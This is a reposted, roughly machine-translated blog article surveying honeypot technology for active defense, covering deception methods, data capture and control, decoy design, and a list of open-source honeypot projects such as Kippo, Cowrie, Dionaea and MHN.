Active defense - honeypot technology research

Others 2019-09-26 15:27:53 views: null

Honey Pot

  Is an attack on the parties on the nature of deception techniques by placing some hosts, network services or information as a bait to lure the attacker to attack them, which can capture and analyze attacks, the attacker used to know the tools and methods, suggesting the attack intentions and motivations, allowing the defender clear understanding of the security threats they are facing, and to enhance the ability of the actual security system through technology and management tools.

The reason for using the honeypot technology

  Development of information security to the extent of today's prosperity, security still rely on traditional static signature approach to identify the attack, but with the advent of a new type of APT attacks, many companies realize that traditional security technology has been unable to meet the internal threats to discover, so many traditional security companies fought heavyweights are beginning to use dynamic sandbox technology to solve problems, to sell equipment such as SEP Symantec ATP type of hardware with the configuration of the terminal, there are 360 ​​security guards linked threat intelligence way to detect unknown threats, of course, this is the main way for the first part of APT attacks, the hackers you get user information by means of social engineering, using phishing attacks or puddles way into the enterprise network personal PC. But to get the valuable internal sensitive information, hackers need to deploy further attacks chains, including access to documents, network assets, such as scanning probe work, because many industries including financial institutions are not allowed to install security solutions on business servers, even configure logging system can not, then, currently deployed honeypot is the best solution.

Honeypot Technical Analysis:

  Honeypot technology through the establishment of simulation systems, to deceive the attacker, increase the cost of the attack, the purpose of reducing the security threat system. Meanwhile, the honeypot technology to record the attack tools and methods used by attackers for research, thus choosing the right security measures. Honeypot technology mainly deceived by the honeypot, data acquisition, data control and data analysis four key aspects of the composition. 

  Honeypot cheat primarily through system vulnerabilities spoofing, IP spoofing, spoofing traffic and other technical means. Spoofing vulnerabilities typically analog system services and ports contain loopholes, in order to attract attackers attack, in order to gather the information needed to respond by ports and services; IP spoofing is misleading to judge the attacker through a single network adapters IP, it that there is a target for network attacks; spoofing traffic flow using various means of simulation and real-time replication to create a virtual network traffic, so the flow of real network environment highly similar, the purpose of the fictional network, so an attacker fraud to attack and exploit.

  The main purpose is to obtain data capture and record the behavior of the attacker, the specific implementation can be divided into host and network capture captured two forms. Host captured on the honeypot obtain and record data information attacker behavior, this quick and easy way, but easy to see through the attacker; network capture refers to the act to get information by constructing a honeypot network and record of the attacker, which ways attackers can not easily be found, but in a more complex environment to achieve. 

  Data control is one of the core functions of the honeypot system, mainly to prevent attackers other information systems honeypot system, which requires the attacker to monitor the behavior and limitations, there is usually a firewall and router control two forms of control.

  The main role of the data analysis of various data analysis will be a honeypot is meaningful, understandable information, and to understand and grasp the attacker's attack and attack strategies through which valuable information, providing attack and defense preparedness support.
 

Honeypot drainage technology:

  Honeypot environment protection process includes decoy construct, intrusion monitoring, post-treatment measures three stages. Decoy build environment: by constructing fraudulent data, files, etc., to increase the honeypot environment sweetness, luring attackers invade the system, to achieve the purpose of attack interaction. Interactive simulation of the environment depends on the level of deception and truth, there are mainly analog simulation environment and real system construction scheme.

  Simulation environment simulation program to attract attackers by simulating real important feature of the system, with the ease of deployment advantages. Using one or more open source honeypot to simulate multiple honeypots combine the advantages of different schemes in favor of honeypots integrated; combining simulation program and a virtual honeypot system to build custom schema, improve the degree of interaction; use the hardware simulator hardware virtualization, to avoid damage to the actual hardware. However, the characteristics of the virtual simulation environment simulation solutions exist to be identified risks.

  Program is used to build a real system hardware and software system as a real operational environment, lower the recognition rate, which greatly improves the interaction of the attack. In software systems, using real system interfaces, real hosting services, operations systems, a higher degree of interaction and deceptive, but its high costs and maintenance of protected resources must be faced with the risk of damage. In terms of hardware, real devices can be directly used to attack trapping information, such as physical wearable device as an inducement nodes, mobile phone SIM cards and other cards as honey, improve the degree of deception by building real software and hardware system environment. Using real hardware and software to lure the attacker has certain advantages in low energy scene, but for some internal data exchange frequent business system, the presence of high energy consumption, easy deployment, maintenance costs and large defects.
 

Decoy study abroad honeypot:

    Sochor, who analyzed honeynet topology model, SSH attacks sensor simulation, simulation Windows service attacks and Web service attack, in research network threat detection and honeynet honeypot appeal, that the sweetness of the honey pot. Experiments show that security defenses against the temptation to play an important role in promoting the attacker.

    Dahbul, who use network services fingerprint enhancement honeypot deceive the ability to construct three attacking threat model to analyze the fingerprint to identify potential security threats and build honeypot systems and real systems on this basis, through open and configure the necessary ports, a fixed time stamp, configuration scripts and other means to systematically enhance the honeypot.
 

Honeypot technology architecture:

  1.BitSaucer. It is a combination of low and high interactive interactive honeypots integrally hybrid honeypot, along with interactive honeypot low resource requirements high low and high responsiveness honeypot interactive features. The key mechanism is designed to run on the host agency. Agent daemon is responsible for automatic generation of web hosting based on network traffic and build high-demand interactive honeypots. Due to the high Interactive honeypot is generated on demand, greatly reducing resource consumption.

  2.Honeynet http://www.honeynet.org/

  3.kippo https://github.com/desaster/kippo

  4.glastopf https://github.com/mushorg/glastopf

  5.elastichoney https://github.com/jordan-wright/elastichoney

  6.beeswarm https://github.com/honeynet/beeswarm

  7.DejaVU is an open source framework to deceive, to build frameworks docker, when an attacker tries to touch the bait or certified to perform reconnaissance in the process, will produce highly accurate alerts for defenders to investigate.

  8.MHN (Modern Honeynet) MHN is an open source software that simplifies the deployment of honeypots, while facilitating data collection and statistical honeypot.

  • With ThreatStream ( http://threatstream.github.io/mhn/ ) to deploy after MHN open source honeypot to collect data, organize stored in Mongodb, the information collected can also be demonstrated through the web interface or through the development of API access. MHN provides a variety of open source honeypot, you can add them through the web interface. A honeypot deployment process is very simple, just paste, copy commands can be deployed, the deployment is complete, the information can be collected by open source protocol hpfeeds.
  • MHN honeypot supports the following:
  • Sort:https://www.snort.org/
  • Suricata:http://suricata-ids.org/
  • Dionaea: http://dionaea.carnivore.it/ , Dionaea is to run an application on Linux, the program will run on the network environment, it is common open Internet services default port, when there are external connections, simulate normal service giving feedback, while recording the stream data out of the network. Network data stream after the detection by the detection module by category process, if the simulation is executed shellcode; shellcode will download the specified command specifies a subsequent challenge or to download malicious files. drops has an article on: http://drops.wooyun.org/papers/4584
  • Conpot:http://conpot.org/
  • Kippo: https://github.com/desaster/kippo , it is a medium interaction honeypot can download arbitrary files. drops has an article on: http://drops.wooyun.org/papers/4578
  • Amun: http://amunhoney.sourceforge.net/ , it is a low interactive honeypot, but has been since 2012 after not maintained.
  • Glastopf: http://glastopf.org/ : low-interactive Web application honeypot, Glastopf honeypot It can simulate thousands of web vulnerabilities, attacks against different attacks to respond to the attacker, and then from the target Web application attack of the program is to collect data. Its goal is for automated vulnerability scanning / use of tools, classified by way of exploits, reasonable returns the corresponding results for a certain type of use patterns, in order to achieve a low-interaction.
  • Wordpot:https://github.com/gbrindisi/wordpot
  • ShockPot: https://github.com/threatstream/shockpot , simulated CVE-2014-6271, i.e., broken shells vulnerability
  • p0f:https://github.com/p0f/p0f

  9.Cowrie is an interactive SSH honeypot, the attacker used to get dictionary for brute force SSH, enter the command as well as uploading or downloading malicious files in these records will be recorded in the log them or pour them more convenient database Inquire.

  10.Elasticpot: Analog elastcisearch RCE vulnerability honeypot, by forging function /, / _ fragile ES response JSON format example of the request message search, / _nodes of.

  11.Emobility: high-interaction honeypots container used in the T-Pot, designed to collect attack motives and methods for next-generation transportation infrastructure. Emobility Honeynet contains a central charging system, charge a few points, simulate user transactions. Once the attacker to access the web interface in the control system, monitoring and operation of toll transactions processed, and interact with the toll point. In addition, at random times, the hacker may interact with the user is the collection of vehicle costs.

  12.Honeytrap: observe attacks against TCP or UDP service as a daemon simulate some well-known service, and be able to analyze the attack string, follow the appropriate instructions to download the file.

  13.Conpot: low-interaction honeypot IPC, offers a range of general industrial control protocol, capable of simulating complex industrial infrastructure.

  14.Opencanary network within the low-interaction honeypot officially open! The current 0.4 version to keep pace with the official, supports 16 protocols, 24 kinds of attack signature recognition. Project Address: https://github.com/p1r06u3/opencanary_web

Honeypot direction of the new technology:

  Honeypot evolution between attack and defense and attack will continue to upgrade itself in terms of technology, improve the honeypot sweetness, the ability to deceive and to improve the traditional architecture is still the focus of development, are: (1) artificial intelligence technology and integration honeypot : motivation for intruders, using artificial intelligence technology, with intelligent interaction honeypot, honeypot improve learning, anti-recognition capabilities, in order to obtain more attacks interaction data in favor of defense decisions. (2) Block Chaining the honeypot technology and integration: the distributed honeypot, Honeynet distributed architecture, etc., reference block chain distributed, decentralized technology, a proprietary chain or chain alliance based on P2P architecture, the honeypot automate operations and to ensure internal system data occult. (3) genetic and evolutionary computation honeypot integration: offensive and defensive environments for complex transform, the honeypot can take advantage of high robustness Evolutionary Computation, universality to accommodate different under different environmental problems, provided that the adaptive honeypot , self-organizing, self-evolution and other advantages.

  In the application honeypot, honeypot and new technology integration, expansion into new areas is a future trend: all levels of cloud services (IaaS, PaaS, SaaS) popularity (1), conducted research can provide honey for security personnel convenience, extending as cloud computing, calculated using the edge of the network edge device, having a low latency advantages. The calculated binding edge honeypot, honeypot of things terminal device and sensor data collection process, and transmits the result to the cloud service layer, to improve the processing speed and to reduce instant load server. (2) the current honeypot research focused on the traditional network architecture, network architecture as a new advantage, SDN (Software Defined Network) has characteristics programmable, open interfaces, and in some SDN open source projects, there is a denial of service attack, to the north Interface protocol attacks and other acts, therefore, honeypot can be applied to SDN, in terms of controllers, interfaces, etc. trick attackers, maintain network security and stability. (3) high degree of integration with hardware and software features of the "new hardware coming of age", unmanned technology, 3D printing and other new hardware devices become a new target for attacks, can be combined with the lightweight honeypot new hardware devices, detect suspicious recognition attack, refused to execute malicious instructions.

  Honeypot new technology : high-fidelity simulation system adaptive to deceive (High-Fidelity Adaptive Deception & Emulation System), HADES thrust is to provide an environment of deception and deceit to promote activities to sort out the ongoing attacks of relevant information and signatures. Technically speaking, HADES use of cloud technology, especially software-defined network and virtual machine introspection technology, the virtual system can be attacked quickly from the production network to go high-fidelity virtual version of the network in addition to copies of sensitive data. HADES can migrate the virtual machine to a state other parts of the network and its surroundings to start the simulation.

  When the intruder no sleep detect the sandbox network, the analyst can observe the action of the intruder, learns their goals and attack tools used. You can observe the behavior of the opponent, reconstruction defensive tools, real-time to develop their own intelligence.

  Even if a hacker eventually found himself in a sandbox operation, because they do not know when it was removed from the real network, it is not clear their own data collection in the end how much is true. HADES aim is to make the attacker doubts. Even got something in the end is true or false? For an attacker most horrible thing is the "world or the world, but it has changed."

  However, HADES does not replace attack detection tool. In fact, although HADES also provide intrusion detection tool, but it is the use of third-party applications. HADES provides a flexible application programming interface to interact with these tools.

wx Aust fish

Introduce myself, and I was Fisher , an Internet security author, daily security technology to share interesting stories and, of course, will record harvest road learning. Interested in the security field , we can focus on my personal micro-channel public number: austfish . Want to go throw it, please pay attention to [security] Fisher's diary ! (Do not forget starred oh) or personal blog: www.austfish.cn

 

Guess you like

Origin www.cnblogs.com/austfish/p/11589525.html
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com